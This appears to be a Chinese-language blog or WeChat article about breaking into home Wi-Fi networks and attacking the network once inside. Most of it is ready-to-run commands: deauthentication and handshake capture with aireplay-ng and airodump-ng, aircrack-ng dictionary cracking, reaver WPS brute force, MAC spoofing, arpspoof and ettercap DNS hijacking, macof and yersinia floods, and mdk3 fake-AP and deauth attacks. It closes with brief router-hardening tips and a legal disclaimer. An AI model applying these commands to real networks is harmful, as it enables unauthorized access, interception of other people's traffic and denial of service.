就一次WIFI 渗透复盘

前言#

本文主要讲述 家庭家庭家庭中（重要的事情说三遍，企业认证服务器的wifi一般非常非常的安全破解不来）如何破解wifi密码，破解wifi密码后的内网渗透利用(简单说明)，如何设置wifi路由器更安全，从渗透的方面看wifi安全，根据需求选择观看

wifi渗透环境的打造#

硬件方面#

需要支持监听模式的无线网卡，一般电脑自带的无线网卡是不支持监听模式的，需要购买
内置kail驱动 RT3070 RTL8187(推荐使用)
我购买的链接如下，用着还行，监听信号比手机强那么一点点
https://m.tb.cn/h.VGGIItU?sm=0b7bf6

软件方面#

因为wifi破解需要软件支持，Windows下载麻烦，推荐kali(因为kali自带很多工具)
因为用到kali，建议使用vmware虚拟机，不建议小白双系统kali或者Microsoft Store中的kali
vmware下载查看：https://www.52pojie.cn/thread-1026907-1-1.html
注意：无线网卡监听模式时如果出现vmware卡代码，监听时间长就停止的情况建议更换上面这个文章的vmware版本
kali的vm镜像下载，下载解压，vmware打开即可使用，下载地址: https://images.offensive-security.com/virtual-images/kali-linux-2020.2a-vmware-amd64.7z?_ga=2.152625529.1921388440.1596879427-46569499.1595490768

vmware和kali和无线网卡基础知识(选看)#

1. 先不要开机 先打开服务
   

2. 运行下图的
   

3. 开机kali后 虚拟机选择网卡的连接
   

4. ifconfig 查看连接一般名字为wlan,但有肯能无线网卡处于down状态可用ifconfig -a查看,然后使ifconfig name up即可

Managed 模式：该模式用于你的无线客户端直接与无线接入点（Access Point，即AP）进行接入连接。在这个模式中，我们可以进行无线接入internet上网，无线网卡的驱动程序依赖无线AP管理整个通信过程。
Master 模式：一些无线网卡支持Master模式。这个模式允许无线网卡使用特制的驱动程序和软件工作，作为其他设备的无线AP。它主要使用于无线接入点AP提供无线接入服务以及路由功能。比如无线路由器就是工作在Master模式下了，对于普通的pc机来说，如果有合适的硬件它也可以变成一台无线AP。
Ad hoc模式：当你的网络由互相直连的设备组成时，就使用这个模式。在这个模式中，各设备之间采用对等网络的方式进行连接，无线通信双方共同承担无线AP的职责。
Monitor 模式：Monitor模式主要用于监控无线网络内部的流量，用于检查网络和排错。要使Wireshark捕获无线数据包，你的无线网卡和配套驱动程序必须支持监听模式（也叫RFMON模式）。

参见:https://www.linuxidc.com/Linux/2016-09/135521p3.htm

wifi密码的破解#

因为wep加密已经没有使用的，非常不安全，就忽略了

最简单最好用的wifi密码破解方法#

使用wifi万能钥匙，腾讯wifi管家等等，其原理就是wifi密码共享，使用过该软件会将你的连接过的wifi密码共享出去，其本身不是破解而是共享制，连接后我们就可以看见密码了，所以这种破解方法非常的好用，首先推荐

基础说明airodump-ng#

airmon-ng start wlan0     开启监听模式
airodump-ng wlan0mon      开始扫描附近wifi

airodump-ng wlan0mon参数：
-w 输出文件
--ivs 只保存ivs，不再保存所有无线数据，只是保存可以用于破解的IVS数据报文
-c 指定信道
--bssid 指定路由的bssid也就是MAC地址
--essid 指定路由的essid，可以理解为wifi名称（不准确）
airodump-ng wlan0mon 扫描参数

BSSID AP的MAC地址
PWR 信号强度接近0信号好
Beacons 无线ap的发送通告，告诉我是谁 周期发送
#Data 抓到的数据包
CH 信道
MB 最大传输速度
ENC 加密方法
CIPHER 加密算法
AUTH 认证协议
ESSID 通指wifi名字 <length： >表示未广播
STATION 客户端
RATE 传输速率
Lost 最近10秒的丢包数
Frames 来自客户端的数据
Probes 主动弹出 如果客户端正试图连接一个AP但没有连上，会显示这里
Aircrack-ng工具包

• aircrack-ng 破解

• airmon-ng 改变网卡工作模式

• airodump-ng 捕获报文

• aireplay-ng 提供各种攻击

• airserv-ng 网卡连接到指定端口 用作无限跳板

• airolib-ng 彩虹表破解创建数据库文件

• airdecap-ng 解包

WPA破解#

wifi认证流程

指定监听的wifi
airodump-ng -w [文件] --bssid [wifibssid] -c [信道最好指定] wlan0mon

管理针攻击将其他用户踢下线
aireplay-ng -0 5 -a [路由bssid] -c [客户端STATION] wlan0mon

管理针攻击获得握手包

如果出现错误可尝试
--ignore-negative-one 忽略-1信道
根据握手包暴力破解密码
aircrack-ng -w [密码字典] [握手包.cap]



根据握手包破解密码加速
这里推荐使用windows下GPU加速工具EWSA，还有其他加速方式不过我不怎么推荐，也可以找专业的跑包团队来跑包
EWSA下载和使用说明地址:https://www.52pojie.cn/thread-989800-1-1.html
找跑包地址：https://www.anywlan.com/forum-134-1.html

ping攻击 前提路由器开启wps#

8位ping码，第8位数是校验码，只需要破解七位，ping码分前部分(4位)后部分(3位)，pin认证连接失败，路由器返回EAP-NACK信息，通过回应，能够确定pin的前部分或后部分是否正确，所以可能性是11000(10⁴⁺¹⁰3),不过考虑信号和路由器的处理性能网卡功率等可能时间会长，如果信号好，网卡，路由器也比较好一般需要6个小时左右
查看开启wps的wifi

wash -i wlan0mon

reaver -I wlan0mon -b [BSSID] -vv 还可以加其他参数 进行爆破

kali自动化工具wifite#

原理：就是上面的命令只不过是自动化了
使用：cmd输入wifite进入扫描

觉得扫描好了ctrl+c就好，按照序号选择要破解的wifi即可，根据wifi开启了啥会进行自动的破解，如果想跳过某个破解方式按ctrl+c即可，如果获取到握手包自带的密码字典没跑出来，可以去上面提醒的路径找握手包，用自己的字典跑

突破限制#

扫描查看已连接的客户机的mac地址将网卡的mac地址改为其即可
先down掉网卡
ifconfig wlan0 down
修改mac地址
macchanger wlan0 -m [需要修改的mac地址，有些网卡可能不支持修改]
启动网卡
ifconfig wlan0 up

1.等待其他用户连接，会先询问ssid
airodump-ng wlan0mon 就能看见
2.将别人踢下线，让其重连，和抓起握手包一样，注意信道
aireplay-ng -0 5 -a [路由bssid] -c [客户端STATION]

连接wifi后的利用(内网渗透)#

ARP欺骗#

查看内网的主机
nmap -sP 192.168.1.0/24 -v

开启转发模式

echo 1 > /proc/sys/net/ipv4/ip_forward

双向欺骗分别是目标主机ip和网关
arpspoof -i eth0 -t 192.168.1.1 -r 192.168.1.106
arpspoof -i eth0 -t 192.168.1.106 -r 192.168.1.1


启动wireshare查看ip.src == 192.168.1.106，发现欺骗成功可以拦截他的访问

driftnet -i eth0 监听图片

毒化内网用户无法上网#

原理:进行arp欺骗但不进行转发
echo 0 > /proc/sys/net/ipv4/ip_forward
双向欺骗
arpspoof -i eth0 -t 192.168.1.1 -r 192.168.1.106
arpspoof -i eth0 -t 192.168.1.106 -r 192.168.1.1

dns劫持#

目标主机window7 ip地址 192.168.124.128
攻击机kali ip地址 192.168.124.139
劫持到web服务window10(phpstudy) ip地址 192.168.1.104
修改配置文件nano /etc/ettercap/etter.dns

ettercap -Tq -i eth0 -P dns_spoof /// ///
进行欺骗-i后是无线网卡 ///中加目标主机和网卡，不加就是全部，发现window7被劫持成功，如果安装杀毒软件可能劫持不了


如何恢复

ipconfig/flushdns刷新即可

mac地址表泛红#

交换机中有mac地址表记录连接的pc，攻击者不断刷新mac地址来填满交换机的mac地址表，交换机在mac地址表找不到该用户只能通过广播的形式发送，攻击者就可以截获数据
交换机设置静态mac地址绑定可预防，非表内请求将全部丢弃

macof -i eth0

dhcp地址耗尽攻击#

路由器分配ip，攻击者发送大量discover包来获取ip让其者无ip使用，无法连接
先安装
apt-get install yersinia
启动
yersinia -G

干扰通讯#

以下利用前提无线网卡要开启监听模式

创建恶意的无线热点#

工具mdk3 mdk3可查看使用说明

mdk3 wlan0mon b -n SSID (-f 可以导入列表创建多个ssidwifi，不指定则随机) -c [信道] -w -g -s 100

验证洪水攻击(攻击路由器)#

伪造大量的client去连接ap,可导致正在已连接用户无反应 -a后加交换机ssid

mdk3 wlan0mon a -a FC:D7:33:DE:F3:8A -c  -s 300

强制解除验证洪水攻击方式(针对客户机使其下线，通过模仿管理针)#

就是之前抓握手包一样将别人踢下线

aireplay-ng -0 5 -a [路由bssid] -c [客户端STATION] wlan0mon

用mdk3针对全网，在攻击中踢掉线后也无法连接成功

mdk3 wlan0mon d

可-b 加文件指定mac地址攻击

如何设置路由器更安全#

攻与防御本身就是一场博弈根据上面的攻击方式我们可以设置路由器是wifi更安全尤其是物联网的发展，家里的很多东西都要连接网络

1. wifi加密方式采用wpa加密，不用采用wpe加密，如果不懂wps，也不要开启wps功能

2. wifi密码要不要使用弱口令

3. 对于常用设备可以进行ip和mac的绑定

4. 如果没有用户之间相互访问的需求可以开启ap隔离

5. 可以设置访客wifi，防止密码被泄露

6. 就是选用一些比较好的路由器，防止路由器本身存在漏洞，路由器页面就是web页面可能存在漏洞

7. 尽量少使用wifi万能钥匙，腾讯wifi管家等，或者使用时找到里面的设置不共享自己的wifi密码

参考文章#

b站：https://www.bilibili.com/video/BV1e7411o7GB?p=1b站：https://www.bilibili.com/video/BV14z4y1Q7Nb?from=search&seid=10037556429710890008论坛：https://www.anywlan.com/https://www.cnblogs.com/Lmg66/p/13442363.html

本文版权归作者和微信公众号平台共有，重在学习交流，不以任何盈利为目的，欢迎转载。

由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，文章作者不为此承担任何责任。公众号内容中部分攻防技巧等只允许在目标授权的情况下进行使用，大部分文章来自各大安全社区，个人博客，如有侵权请立即联系公众号进行删除。若不同意以上警告信息请立即退出浏览！！！

敲敲小黑板：《刑法》第二百八十五条　【非法侵入计算机信息系统罪；非法获取计算机信息系统数据、非法控制计算机信息系统罪】违反国家规定，侵入国家事务、国防建设、尖端科学技术领域的计算机信息系统的，处三年以下有期徒刑或者拘役。违反国家规定，侵入前款规定以外的计算机信息系统或者采用其他技术手段，获取该计算机信息系统中存储、处理或者传输的数据，或者对该计算机信息系统实施非法控制，情节严重的，处三年以下有期徒刑或者拘役，并处或者单处罚金；情节特别严重的，处三年以上七年以下有期徒刑，并处罚金。

原文始发于微信公众号（巢安实验室）：就一次WIFI 渗透复盘